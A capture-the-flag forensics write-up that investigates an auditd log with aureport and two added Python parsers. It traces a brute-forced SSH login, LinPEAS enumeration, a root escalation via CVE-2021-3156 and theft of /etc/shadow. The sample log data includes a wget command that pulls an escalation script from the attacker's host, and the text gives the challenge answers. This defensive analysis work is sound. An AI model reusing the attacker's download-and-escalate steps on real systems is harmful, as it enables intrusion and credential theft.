Paranoid

Hi :))

Before jumping in, look at the challenge's tag and the file it gives you.

The file is audit.log; a quick Google search turns up the tool that produces and reads it.

Yeah, it's auditd, the Linux audit daemon, lol XD

sudo apt-get update
sudo apt-get -y install auditd

Remember to run this as root (or with sudo), comrades -..-

After installing, the package ships several tools (auditctl, ausearch, aureport, autrace); explaining them all here would take too long hehe

image

After reading the man page, the two options below give a quick overview of the log:

-if,--input <Input File name>: use this file as input

--summary: sorted totals for main object in report

aureport --summary -if audit.log

image

Okay, let's dive into the challenge.

What account was compromised? (2 points)

To find out which account was compromised, look at the authentication report:

-au,--auth: Authentication report

aureport -au -if audit.log

In this report the columns from left to right are date, time, acct, host, term, exe, success, event.

Wow, maybe that's it; I'm a newbie (.-.), sorry if it's wrong hehe

image

btlo

What attack type was used to gain initial access? (2 points)

From the screenshot above it can only be a brute-force attack =)): a flood of failed authentication events for the same account from the same host within a single second, before one of them succeeds.

brute force

What is the attacker’s IP address? (2 points)

It is already listed above, in the host column.

192.168.4.155
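To make the reasoning behind the authentication report explicit, here is an added example (not part of the original write-up) that parses USER_AUTH records straight out of a raw audit.log and flags the same pattern the screenshot shows: many failures for one account from one address inside a one-second window, followed by a success. The log lines are constructed for this example; the account name and source address mirror the answers above, while the timestamps, pids and event ids are made up. The field layout follows the USER_AUTH records auditd writes for PAM authentication.

```python
"""Spot an SSH brute force in a raw audit.log, the way `aureport -au` lets you.

Added example, not from the original write-up. The sample records below are
constructed: acct and addr match the write-up's answers, everything else is
made up, but the layout is the USER_AUTH record auditd writes for PAM.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
type=USER_AUTH msg=audit(1616502046.101:1001): pid=2301 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1616502046.342:1002): pid=2303 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1616502046.577:1003): pid=2305 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1616502046.803:1004): pid=2307 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1616502047.015:1005): pid=2309 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=pam_unix acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=success'
type=USER_AUTH msg=audit(1616502100.250:1006): pid=2400 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=pam_unix acct="admin" exe="/usr/sbin/sshd" hostname=10.0.0.7 addr=10.0.0.7 terminal=ssh res=success'
"""

# key=value pairs; values are either a quoted string or a run of non-space characters
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# msg=audit(<epoch>.<millis>:<event id>)
TS_RE = re.compile(r'msg=audit\((\d+)\.(\d+):(\d+)\)')


def parse_record(line):
    """Flatten one audit record into a dict; quotes stripped, ts as float, event id as int."""
    rec = {k: v.strip('\'"') for k, v in FIELD_RE.findall(line)}
    m = TS_RE.search(line)
    if m:
        rec["ts"] = float(f"{m.group(1)}.{m.group(2)}")
        rec["event"] = int(m.group(3))
    return rec


def auth_events(log_text):
    """Only the USER_AUTH records, i.e. what `aureport -au` reports on."""
    records = (parse_record(l) for l in log_text.splitlines() if l.strip())
    return [r for r in records if r.get("type") == "USER_AUTH"]


def find_bruteforce(log_text, threshold=3, window=1.0):
    """Return (acct, addr, failure_count) for every account/source pair that
    accumulated `threshold` or more failed logins inside `window` seconds and
    then authenticated successfully: a brute force that worked."""
    by_src = defaultdict(list)
    for r in auth_events(log_text):
        by_src[(r.get("acct"), r.get("addr"))].append(r)

    hits = []
    for (acct, addr), recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r["ts"] for r in recs if r.get("res") == "failed"]
        # sliding window over the sorted failure timestamps
        burst = False
        for i in range(len(fails)):
            j = i
            while j < len(fails) and fails[j] - fails[i] <= window:
                j += 1
            if j - i >= threshold:
                burst = True
                break
        first_fail = fails[0] if fails else None
        succeeded_after = first_fail is not None and any(
            r.get("res") == "success" and r["ts"] > first_fail for r in recs)
        if burst and succeeded_after:
            hits.append((acct, addr, len(fails)))
    return hits


if __name__ == "__main__":
    for acct, addr, n in find_bruteforce(SAMPLE_LOG):
        print(f"brute force: acct={acct} from {addr}, {n} failures then success")
```

Point the script at a real audit.log by reading the file into `log_text`; the `res=failed` / `res=success` split and the per-second burst are exactly what the aureport -au screenshot shows in table form, and the `admin` login from 10.0.0.7 in the sample shows a single clean success does not trip the check.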

What tool was used to perform system enumeration? (2 points)

Once the attacker has a shell, look at what he typed at the console. The TTY report is built from keystroke records written by pam_tty_audit, so it only exists where that module was enabled:

--tty: Report about tty keystrokes

aureport --tty -if audit.log

From the image, the attacker used wget to download the linpeas.sh script from his own machine, served on port 8000.

image

After a bit of research on Google: LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.

lsb_release -a

The command lsb_release -a displays the version information and description of a Linux distribution according to the LSB (Linux Standard Base) standard, which tells the attacker exactly which distro and release he is on.

image

Then he pulled evil.tar.gz from his own machine with wget and ran make ... wait, pause here: what is the make command for?

There is plenty of documentation if you want to understand make fully.

Put simply, make reads a description file (the Makefile) written by the program's author and rebuilds only what is out of date, which avoids repetitive compile commands and saves time.

Then he executed ./evil with the argument 0 (I don't really understand this part @~@), and then he erased his tracks and left.

What is the name of the binary and pid used to gain root? (3 points)

From the analysis above we know a binary called evil was executed, so let's list the ids of the processes that ran.

-p,--pid: Pid report

I forgot: there will be a lot of them and most are unrelated to what we are looking for, so filter them with grep 'evil':

aureport -p -if audit.log | grep 'evil'

From left to right the columns are date, time, pid, exe, syscall, auid, event.

image

evil, 829992
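The two reports above (aureport --tty for the keystrokes, aureport -p | grep evil for the pid) both come from records in the same audit.log, so here is an added example (not from the original write-up) that reproduces them from raw records: it decodes the hex-encoded keystrokes in TTY records into typed lines, finds the SYSCALL record for a binary by name to get its pid, and then checks whether that process spawned anything running as euid=0, which is the tell-tale that the escalation worked. The records are constructed for this example: the layout follows the kernel's TTY and SYSCALL audit records, the binary name and pid match the answer above, and the paths, parent pid, timestamps and event ids are made up. The control-character rendering (<ret>, <backspace>, <^C>) is a simplified one and is not claimed to match aureport's output byte for byte.

```python
"""Decode TTY keystroke records and locate a binary's pid in a raw audit.log.

Added example, not from the original write-up. The sample below is constructed:
record layout follows the kernel's TTY and execve SYSCALL audit records, the
binary name and pid match the write-up's answer, all other values are made up.
"""
import re
from collections import defaultdict

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def to_audit_hex(text):
    """Hex-encode keystrokes the way the kernel's audit_log_n_hex does (builds the sample)."""
    return text.encode().hex().upper()


SAMPLE_LOG = "\n".join([
    'type=TTY msg=audit(1616502300.001:1200): tty pid=829900 uid=1000 auid=1000 ses=3 major=136 minor=0 comm="bash" data='
    + to_audit_hex("wget http://192.168.4.155:8000/linpeas.sh\r"),
    'type=TTY msg=audit(1616502400.002:1201): tty pid=829900 uid=1000 auid=1000 ses=3 major=136 minor=0 comm="bash" data='
    + to_audit_hex("make\r./evil 0\r"),
    'type=SYSCALL msg=audit(1616502405.003:1202): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=829900 pid=829992 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="evil" exe="/home/btlo/evil" key=(null)',
    'type=SYSCALL msg=audit(1616502405.500:1203): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=829992 pid=829995 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key=(null)',
])


def parse_record(line):
    """Flatten one audit record into a dict of its key=value fields, quotes stripped."""
    return {k: v.strip('\'"') for k, v in FIELD_RE.findall(line)}


def render_keystrokes(hex_data):
    """Turn the hex payload of a TTY record into readable text with control keys marked."""
    out = []
    for b in bytes.fromhex(hex_data):
        if b == 0x0D:
            out.append("<ret>")
        elif b == 0x7F:
            out.append("<backspace>")
        elif b == 0x09:
            out.append("<tab>")
        elif b < 0x20:
            out.append(f"<^{chr(b + 64)}>")   # e.g. 0x03 -> <^C>
        else:
            out.append(chr(b))
    return "".join(out)


def tty_sessions(log_text):
    """shell pid -> list of typed lines (one per <ret>), what aureport --tty shows per session."""
    typed = defaultdict(str)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("type") == "TTY" and "data" in rec:
            typed[int(rec["pid"])] += render_keystrokes(rec["data"])
    return {pid: [l for l in s.split("<ret>") if l] for pid, s in typed.items()}


def find_process(log_text, name):
    """(pid, exe, auid) for execve SYSCALL records whose comm or exe basename is `name`."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("type") != "SYSCALL":
            continue
        exe = rec.get("exe", "")
        if rec.get("comm") == name or exe.rsplit("/", 1)[-1] == name:
            hits.append((int(rec["pid"]), exe, rec.get("auid")))
    return hits


def root_children(log_text, parent_pid):
    """pids spawned by `parent_pid` that run with euid=0: evidence the exploit handed out root."""
    return [int(r["pid"]) for r in (parse_record(l) for l in log_text.splitlines())
            if r.get("type") == "SYSCALL" and r.get("ppid") == str(parent_pid)
            and r.get("euid") == "0"]


if __name__ == "__main__":
    for pid, lines in tty_sessions(SAMPLE_LOG).items():
        print(f"tty session of pid {pid}:", lines)
    for pid, exe, auid in find_process(SAMPLE_LOG, "evil"):
        print(f"{exe} ran as pid {pid} (auid {auid}); root children: {root_children(SAMPLE_LOG, pid)}")
```

Note that the pid on a TTY record is the shell that received the keystrokes, not the program they launched; the pid of the binary itself is on its execve SYSCALL record, which is why the pid report and not the tty report answers this question.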

What CVE was exploited to gain root access? (Do your research!) (3 points)

hehe, too easy

image

CVE-2021-3560

boom! Wrong, right? =))) I also thought it would be an easy win kkk

Keep searching.

Let's try this one and see if it's right.

image

CVE-2021-3156

ohhhhhhhhhhhhhhh~ that's righttttttt

Here it is: CVE-2021-3156 (Baron Samedit), the heap-based buffer overflow in sudo's handling of command-line arguments, fixed in sudo 1.9.5p2.

What type of vulnerability is this? (3 points)

right ~

image

Heap-Based Buffer Overflow

What file was exfiltrated once root was gained? (3 points)

I was confused about this all morning :))

And after looking back, I realized I had missed it :_)

image

/etc/shadow

OK, okay, I'm tired TT

Goodbye, and thank you for reading this far //~//

This post is licensed under CC BY 4.0 by the author.